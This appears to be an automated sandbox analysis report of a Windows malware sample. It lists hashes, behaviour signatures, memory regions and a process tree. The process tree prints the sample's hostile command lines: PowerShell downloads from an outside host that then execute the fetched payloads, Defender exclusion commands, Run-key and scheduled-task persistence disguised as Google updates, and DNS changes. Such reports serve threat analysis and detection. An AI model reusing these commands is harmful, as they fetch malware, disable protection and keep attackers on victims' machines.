Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    58s
  • max time network
    82s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    21/09/2022, 06:12

General

  • Target

    303359be5a96f2404af7e635640b257d.exe

  • Size

    138KB

  • MD5

    303359be5a96f2404af7e635640b257d

  • SHA1

    eed5a46a5605103022aee765c65b0edae9d33ebf

  • SHA256

    0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c

  • SHA512

    526f035c53e3d5c6289f08dae106e8c955e83d1503a4bfd906e3f6997ee45f10cc942b55850e214036fbd560a568a3b4580eed4ad7d80977d2daa0e4681a00fc

  • SSDEEP

    3072:rw7s+ebZ7usUCAco7ILE0+50u+kKVzdCf/z8:rn+ebTUCAco7IZLYCZI/

Score
8/10

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe
    "C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1552 -s 1208
      2⤵
      • Program crash
      PID:1668
  • C:\ProgramData\Google\unzip.exe
    "C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:996
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\SysWOW64\netsh.exe
        netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
        3⤵
          PID:1312
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\netsh.exe
          netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
          3⤵
            PID:952
      • C:\ProgramData\Google\unzip.exe
        "C:\ProgramData\Google\unzip.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'unzip.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\ProgramData\Google\unzip.exe
        "C:\ProgramData\Google\unzip.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:696
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            3⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:548
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\SysWOW64\reg.exe
            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            3⤵
            • Adds policy Run key to start application
            • Modifies registry key
            PID:1224
      • C:\ProgramData\Google\unzip.exe
        "C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1992
      • C:\ProgramData\Google\unzip.exe
        "C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo2.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1760
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
            3⤵
            • Creates scheduled task(s)
            PID:1976
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
          2⤵
            PID:276

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\Google\unzip.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • C:\ProgramData\Google\unzip.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • C:\ProgramData\Google\unzip.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • C:\ProgramData\Google\unzip.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • C:\ProgramData\Google\unzip.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • memory/432-90-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/432-66-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/432-84-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/908-82-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/908-69-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/996-81-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/996-57-0x0000000075241000-0x0000000075243000-memory.dmp

          Filesize

          8KB

        • memory/996-65-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/1552-54-0x00000000002D0000-0x00000000002F8000-memory.dmp

          Filesize

          160KB

        • memory/1856-68-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/1856-76-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/1992-67-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/1992-85-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB

        • memory/1992-86-0x0000000073620000-0x0000000073BCB000-memory.dmp

          Filesize

          5.7MB